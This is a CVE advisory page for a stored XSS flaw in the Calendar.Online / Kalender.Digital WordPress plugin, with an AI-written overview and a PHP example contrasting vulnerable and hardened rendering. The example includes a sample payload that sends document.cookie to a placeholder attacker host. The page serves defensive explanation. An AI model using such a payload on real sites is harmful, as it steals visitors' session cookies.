CVE-2024-38678
Description
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Calendar.Online Calendar.Online / Kalender.Digital allows Stored XSS. This issue affects Calendar.Online / Kalender.Digital: from n/a through 1.0.8.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in WordPress Calendar.Online plugin up to 1.0.8 allows attackers to inject malicious scripts via improper input neutralization.
Vulnerability
Overview
The vulnerability is a Stored Cross-Site Scripting (XSS) in the Calendar.Online / Kalender.Digital WordPress plugin, versions up to 1.0.8. It stems from improper neutralization of input during web page generation: calendar content supplied by a user is written into the page without output encoding, so an attacker can inject arbitrary HTML and JavaScript that persists on the site and is served to every subsequent visitor [1].
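The following is an added illustration of the CWE-79 pattern described above, not code from the Calendar.Online / Kalender.Digital plugin. It assumes a hypothetical event-title field and uses plain PHP so it runs from the command line; the WordPress equivalents of each call are named in the comments.

```php
<?php
// Added example, not plugin code. The "event title" field and the attacker
// payload below are constructed for illustration.

// Constructed sample: a value an attacker with calendar edit rights might store.
$storedTitle = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable render: the stored value is interpolated straight into HTML.
// Whatever was saved reaches the browser as markup, so the onerror handler runs
// for every visitor who loads the page (the stored-XSS case).
function render_event_vulnerable(string $title): string {
    return "<div class=\"event\"><span class=\"title\">$title</span></div>";
}

// Hardened render: encode at the point of output, for the HTML text context.
// WordPress: esc_html() for text nodes, esc_attr() inside attributes,
// esc_url() for href/src, wp_kses_post() only where limited HTML is required.
function render_event_hardened(string $title): string {
    $safe = htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div class=\"event\"><span class=\"title\">$safe</span></div>";
}

// Hardened attribute render: the same value placed inside a quoted attribute.
// ENT_QUOTES ensures both quote characters are encoded so the attribute cannot
// be closed early.
function render_event_attr_hardened(string $title): string {
    $safe = htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div class=\"event\" title=\"$safe\"></div>";
}

// Input-side sanitization on save. This reduces what gets stored but does not
// replace output encoding: the render context decides what is safe.
// WordPress: sanitize_text_field() behaves similarly.
function sanitize_event_title(string $raw): string {
    $clean = strip_tags($raw);
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $clean);
    return trim($clean);
}

echo render_event_vulnerable($storedTitle), PHP_EOL;       // markup survives; script executes
echo render_event_hardened($storedTitle), PHP_EOL;         // rendered as literal text
echo render_event_attr_hardened($storedTitle), PHP_EOL;    // quotes encoded; attribute intact
echo sanitize_event_title($storedTitle), PHP_EOL;          // tag stripped before storage
```

Run with `php example.php`. The point to take from the two render functions is that the fix belongs at output time, chosen per context (text node, attribute, URL); the sanitize step is defence in depth and on its own would still leave other render paths exposed.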
Exploitation
Exploitation requires an account privileged enough to submit calendar content that the plugin stores without neutralization. The attacker places a script payload in a calendar field; because the payload is stored server-side, it is delivered to every user, including unauthenticated site visitors, who loads the affected page. No further interaction is needed in the common case, since the payload runs automatically on page load; interaction such as clicking a link is required only in variants where the payload sits in an element that is not rendered on load [1].
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser. This can lead to session hijacking, redirection to malicious sites, defacement, or theft of sensitive information. The vulnerability could be exploited in mass campaigns to compromise numerous WordPress sites running the plugin [1].
Mitigation
The vendor has released version 1.0.9, which is reported to fix the issue, and users are strongly advised to update immediately. Note that the Patches section below lists no patch, so confirm the installed version on the WordPress Plugins page and check the vendor changelog before treating 1.0.9 as patched. Patchstack also provides a mitigation rule to block attacks until the update is applied. For sites unable to update immediately, a temporary workaround is to deactivate the plugin or seek assistance from a web developer [1].
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Range: <=1.0.8
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.